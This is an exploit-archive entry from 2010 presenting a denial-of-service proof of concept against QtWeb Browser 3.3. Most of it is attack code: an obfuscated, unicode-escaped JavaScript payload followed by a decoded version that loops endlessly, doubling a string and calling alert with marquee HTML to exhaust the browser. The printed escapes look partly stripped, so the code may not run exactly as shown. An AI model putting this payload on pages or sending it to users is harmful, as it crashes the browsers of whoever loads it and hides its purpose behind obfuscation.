QtWeb Browser version 3.3 Dos

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : QtWeb Browser version 3.3 Dos
# Published : 2010-05-18
# Author : PoisonCode
# Previous Title : NetBSD 5.0 and below Hack PATH Environment overflow proof of concept
# Next Title : Firefox 3.6.3 & Safari 4.0.5 - Access Violation Exception and Unknown Exception

# Title: QtWeb Browser version 3.3 Dos based in Xss
# Software:http://www.qtweb.net/downloads/QtWeb-setup.exe
# Portable Software:http://www.qtweb.net/downloads/QtWeb.exe
# Version: 3.3
# Tested on: Windows
# Author: PoisonCode
# Published: 2010-05-17
# CVE-ID:()

_____   _____                      _ _         
|  __  / ____|                    (_) |        
| |__) | (___   ___  ___ _   _ _ __ _| |_ _   _ 
|  ___/ ___  / _ / __| | | | '__| | __| | | |
| |     ____) |  __/ (__| |_| | |  | | |_| |_| |
|_|    |_____/ ___|___|__,_|_|  |_|__|__, |
                                           __/ |
                                          |___/

PanamaSecurity.blogspot.com

Anti Lammer Enconde
                                                                                                                                                                     
<script type="text/javascript">document.write('u003Cu0062u006Fu0064u0079u0020u006Fu006Eu006Cu006Fu0061u0064u003Du0022u006Au0061u0076u0061u0073u0063u0072u0069u0070u0074u003Au0062u006Cu006Fu0063u006Bu0028u0029u003Bu0022u003Eu003Cu002Fu0062u006Fu0064u0079u003Eu000Du0020u000Du003Cu0073u0063u0072u0069u0070u0074u003Eu000Du0020u000Du0066u0075u006Eu0063u0074u0069u006Fu006Eu0020u0062u006Cu006Fu0063u006Bu0028u0029u0020u007Bu000Du0020u000Du0076u0061u0072u0020u0062u0020u003Du0020u0027u005Cu0078u0034u0043u005Cu0078u0045u0046u005Cu0078u0031u0033u005Cu0078u0030u0030u0027u003Bu000Du0066u006Fu0072u0020u0028u0061u0020u003Du0030u003Bu0061u003Cu0039u0039u0039u0039u0039u0039u0039u0039u0039u0039u0039u003Bu0061u002Bu002Bu0029u0020u007Bu000Du0062u002Bu003Du0062u002Bu0027u005Cu0078u0034u0043u005Cu0078u0045u0046u005Cu0078u0031u0033u005Cu0078u0030u0030u0027u003Bu000Du0061u006Cu0065u0072u0074u0028u0027u003Cu0068u0074u006Du006Cu003Eu003Cu006Du0061u0072u0071u0075u0065u0065u003Eu003Cu0068u0031u003Eu0027u002Bu0062u002Bu0062u0029u003Bu000Du000Du007Du000Du0020u000Du007Du000Du0020u000Du003Cu002Fu0073u0063u0072u0069u0070u0074u003Eu000Du000D');</script>

==================================================
EDB Notes - Decoded Version:
==================================================

<body onload="javascript:block();"></body>

<script>
function block() {
var b = 'x4CxEFx13x00';
for (a =0;a<99999999999;a++) {
b+=b+'x4CxEFx13x00';
alert('<html><marquee><h1>'+b+b);
}
}
</script>